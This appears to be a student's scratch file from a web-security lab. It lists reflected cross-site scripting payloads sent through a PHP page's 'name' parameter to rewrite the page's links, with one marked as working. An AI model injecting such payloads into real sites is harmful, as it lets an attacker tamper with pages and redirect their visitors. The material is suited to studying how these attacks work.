-
Notifications
You must be signed in to change notification settings - Fork 0
/
xss_0_aw.txt
14 lines (7 loc) · 991 Bytes
/
xss_0_aw.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
permalink.co/multivac/biteme.php?name=<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">$(document).ready(function(){document.getElementsByTagName("a")).attr("href", "http://www.ece.illinois.edu/")});</script>
getElementsByTagName("a")).attr("href", "http://www.ece.illinois.edu/")});</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">$(document).ready(function(){$(document).getElementsByTagName("a").attr("href", "http://www.ece.illinois.edu/")});</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">$(document).ready(function(){$("a").attr("href", "http://www.ece.illinois.edu/")});</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">$("a").attr("href", "http://www.ece.illinois.edu/");</script>
THIS ONE WORKS:
<script>window.onload=function(){document.getElementsByTagName("a")[0].setAttribute("href","http://www.ece.illinois.edu/")};</script>